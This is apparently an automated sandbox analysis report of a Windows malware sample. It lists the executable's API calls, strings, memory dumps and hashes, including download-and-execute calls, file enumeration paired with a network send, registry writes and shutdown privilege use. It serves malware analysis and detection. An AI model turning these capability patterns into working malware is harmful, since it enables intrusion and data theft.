                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$Open$ManagerStart
                                        • String ID:
                                        • API String ID: 276877138-0
                                        • Opcode ID: 6d0f589b7f4ed5c193fffaa70fef351a53496163331b96a9b3d3840ad54bf661
                                        • Instruction ID: 029754fb73528063a62336f1848e5bb122dc48601db67947cc2268dfcf3d9ab0
                                        • Opcode Fuzzy Hash: 6d0f589b7f4ed5c193fffaa70fef351a53496163331b96a9b3d3840ad54bf661
                                        • Instruction Fuzzy Hash: 2EF089755053146FD2115B31FC88DBF2AECEF85BA6B00043AF54193191DB68CD4595F5
                                        APIs
                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00418ECF
                                        • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F9B
                                          • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Find$CreateFirstNext
                                        • String ID: @CG$XCG$>G
                                        • API String ID: 341183262-3030817687
                                        • Opcode ID: bdf19f3600ef3cc3e8fbade951765131cd50cae54f5c0b8e5a05de1674f7c19c
                                        • Instruction ID: 4fcfe6ad4d4b9cbb37a9178feb6c4e4542e518df657a804f5f9e1d603b628f73
                                        • Opcode Fuzzy Hash: bdf19f3600ef3cc3e8fbade951765131cd50cae54f5c0b8e5a05de1674f7c19c
                                        • Instruction Fuzzy Hash: 408153315042405BC314FB61C892EEF73A9AFD1718F50493FF946671E2EF389A49C69A
                                        APIs
                                          • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                          • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                          • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                          • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                          • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                        • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                        • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                        • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                        • String ID: PowrProf.dll$SetSuspendState
                                        • API String ID: 1589313981-1420736420
                                        • Opcode ID: 9a2ea4b760d1687da6394f818f94bf6b74c7e65cca45165fb093390337838f86
                                        • Instruction ID: a9af72b6b9eaf8561cd509fc4cf8b1c610007ddf0d7e7dc7bbe2947ee761077a
                                        • Opcode Fuzzy Hash: 9a2ea4b760d1687da6394f818f94bf6b74c7e65cca45165fb093390337838f86
                                        • Instruction Fuzzy Hash: B22161B0604741E6CA14F7B19856AFF225A9F80748F40883FB402A71D2EF7CDC89865F
                                        APIs
                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451512,?,00000000), ref: 0045128C
                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451512,?,00000000), ref: 004512B5
                                        • GetACP.KERNEL32(?,?,00451512,?,00000000), ref: 004512CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID: ACP$OCP
                                        • API String ID: 2299586839-711371036
                                        • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                        • Instruction ID: c7787d6075dc192170befbe1ddc6ff7be643600d5f5c624e054d22ce072cfab5
                                        • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                        • Instruction Fuzzy Hash: 9621C432A00100A7DB348F55C900B9773A6AF54B66F5685E6FC09F7232E73ADD49C399
                                        APIs
                                        • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A660
                                        • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A674
                                        • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67B
                                        • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A68A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Resource$FindLoadLockSizeof
                                        • String ID: SETTINGS
                                        • API String ID: 3473537107-594951305
                                        • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                        • Instruction ID: 54a99f42213d160abf76577abca5e20a835261b5cb21c96a6540e7550e34f59b
                                        • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                        • Instruction Fuzzy Hash: F3E09A7A604710ABCB211BA5BC8CD477E39E786763714403AF90592331DA359850DA59
                                        APIs
                                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,00000000,?,0043B965,00000000,00000000), ref: 00446ED3
                                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F47
                                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F3B
                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514D3
                                        • IsValidCodePage.KERNEL32(00000000), ref: 0045152E
                                        • IsValidLocale.KERNEL32(?,00000001), ref: 0045153D
                                        • GetLocaleInfoW.KERNEL32(?,00001001,00443CFC,00000040,?,00443E1C,00000055,00000000,?,?,00000055,00000000), ref: 00451585
                                        • GetLocaleInfoW.KERNEL32(?,00001002,00443D7C,00000040), ref: 004515A4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                        • String ID:
                                        • API String ID: 745075371-0
                                        • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                        • Instruction ID: 411f265c59fe6ea8e7a4a7f389aa671ff947d679512e0c94986e3a05ae8bdf1c
                                        • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                        • Instruction Fuzzy Hash: 4951B331900205ABDB20EFA5CC41BBF73B8AF05306F14456BFD11DB262D7789948CB69
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00407A91
                                        • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstH_prologNext
                                        • String ID:
                                        • API String ID: 1157919129-0
                                        • Opcode ID: e8fc1aae19a95acc5e5ba4988fa9a3d6b6627a504d1d70c366dbdaaaee21e51e
                                        • Instruction ID: 8d2d5af9b240bd76912c5a42ed9d01478aca41623b4ca31e05b92188a1ecdcc3
                                        • Opcode Fuzzy Hash: e8fc1aae19a95acc5e5ba4988fa9a3d6b6627a504d1d70c366dbdaaaee21e51e
                                        • Instruction Fuzzy Hash: EE5172329041089ACB14FBA5DD969ED7778AF50318F50017EB806B31D2EF3CAB498B99
                                        APIs
                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
                                        • _free.LIBCMT ref: 00448077
                                          • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,0000000A,00000000,0000000A,00000000,?,0044FD04,0000000A,00000007,0000000A,?,00450215,0000000A), ref: 00446AEB
                                          • Part of subcall function 00446AD5: GetLastError.KERNEL32(0000000A,?,0044FA60,0000000A,00000000,0000000A,00000000,?,0044FD04,0000000A,00000007,0000000A,?,00450215,0000000A,0000000A), ref: 00446AFD
                                        • _free.LIBCMT ref: 00448243
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                        • String ID:
                                        • API String ID: 1286116820-0
                                        • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                        • Instruction ID: 9f73030e0ab81e705d7e97d576e5185c64763d3f00745452c155363557a16cba
                                        • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                        • Instruction Fuzzy Hash: 97512A718002099BE714EF69CC829BF77BCEF44364F11026FE454A32A1EB389E46CB58
                                        APIs
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                        Strings
                                        • open, xrefs: 0040622E
                                        • C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, xrefs: 0040627F, 004063A7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DownloadExecuteFileShell
                                        • String ID: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe$open
                                        • API String ID: 2825088817-2811046045
                                        • Opcode ID: b67075259e0bd929e0ab264c94f4d1ca59ca1de50cdaeebcdd70e2622b8f7750
                                        • Instruction ID: ed092bbb38966d98691ab8c1252c2e533cce500cde7a5ae80e96292b959be8c1
                                        • Opcode Fuzzy Hash: b67075259e0bd929e0ab264c94f4d1ca59ca1de50cdaeebcdd70e2622b8f7750
                                        • Instruction Fuzzy Hash: AC61A231604340A7CA14FA76C8569BE77A69F81718F00493FBC46772E6EF3C9A05C69B
                                        APIs
                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                        • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                          • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileFind$FirstNextsend
                                        • String ID: x@G$x@G
                                        • API String ID: 4113138495-3390264752
                                        • Opcode ID: 21733312e49eae253e2bcb47d9c134556802c5ae893f427082e78e5a185c5d5d
                                        • Instruction ID: 69ed09b71aae528489a15fdfe73527b1f784865601dfee234b785914c9021214
                                        • Opcode Fuzzy Hash: 21733312e49eae253e2bcb47d9c134556802c5ae893f427082e78e5a185c5d5d
                                        • Instruction Fuzzy Hash: 4D2147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                        APIs
                                        • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                                          • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                          • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                          • Part of subcall function 004126D2: RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateInfoParametersSystemValue
                                        • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                        • API String ID: 4127273184-3576401099
                                        • Opcode ID: 3d360fdf2e78990b0619b3c2804760803c56fcbcebbcac8b827f4f8c51bc1c9b
                                        • Instruction ID: f939710b15fdea32ddc266fac7b70a3034aa980cea7cdc9a443a85228e3c1b8e
                                        • Opcode Fuzzy Hash: 3d360fdf2e78990b0619b3c2804760803c56fcbcebbcac8b827f4f8c51bc1c9b
                                        • Instruction Fuzzy Hash: 69113332B8060433D514343A4E6FBAE1806D756B60FA4015FF6026A7DAFB9E4AE103DF
                                        APIs
                                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,00000000,?,0043B965,00000000,00000000), ref: 00446ED3
                                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F47
                                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443D03,?,?,?,?,?,?,00000004), ref: 00450B71
                                        • _wcschr.LIBVCRUNTIME ref: 00450C01
                                        • _wcschr.LIBVCRUNTIME ref: 00450C0F
                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443D03,00000000,00443E23), ref: 00450CB2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                        • String ID:
                                        • API String ID: 4212172061-0
                                        • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                        • Instruction ID: 5c43a781d12153ba09aec0d98fe41cbdfc67d130b552f984b55d9713d4fa54bc
                                        • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                        • Instruction Fuzzy Hash: 8C613C39600306AAD729AB35CC42AAB7398EF05316F14052FFD05D7283E778ED49C769
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00408DAC
                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileFind$FirstH_prologNext
                                        • String ID:
                                        • API String ID: 301083792-0
                                        • Opcode ID: ba71cde6abd387c0af899193430974a98498f8e11ae542d92e598f3d86220441
                                        • Instruction ID: f05055f275ce1a6697326a6dce2c5e98ec7bccfbf1b509f624b4afbba7a31620
                                        • Opcode Fuzzy Hash: ba71cde6abd387c0af899193430974a98498f8e11ae542d92e598f3d86220441
                                        • Instruction Fuzzy Hash: 08714F728001199BCB15EBA1DC919EE7778AF54318F10427FE846B71E2EF386E45CB98
                                        APIs
                                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,00000000,?,0043B965,00000000,00000000), ref: 00446ED3
                                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F47
                                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F3B
                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450ECE
                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F1F
                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FDF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorInfoLastLocale$_free$_abort
                                        • String ID:
                                        • API String ID: 2829624132-0
                                        • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                        • Instruction ID: f4db154689a757c669ee29d9ad80dc5f2d25de97e2fa36f56d0a3b4566e2e889
                                        • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                        • Instruction Fuzzy Hash: 5261B3359002079BEB289F24CC82B7A77A8EF04706F1041BBED05C6696E77CD989DB58
                                        APIs
                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 0043A765
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 0043A76F
                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 0043A77C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                        • Instruction ID: 91e5dab5071ea2c3d468f992cf6309450941867bc48944ec1b7f80ed58ec6f75
                                        • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                        • Instruction Fuzzy Hash: 4A31D27494132CABCB21DF24D98979DBBB8AF08310F5051EAE80CA7261E7349F81CF49
                                        APIs
                                        • GetCurrentProcess.KERNEL32(?,?,0044253A,?,0046DAE0,0000000C,00442691,?,00000002,00000000), ref: 00442585
                                        • TerminateProcess.KERNEL32(00000000,?,0044253A,?,0046DAE0,0000000C,00442691,?,00000002,00000000), ref: 0044258C
                                        • ExitProcess.KERNEL32 ref: 0044259E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
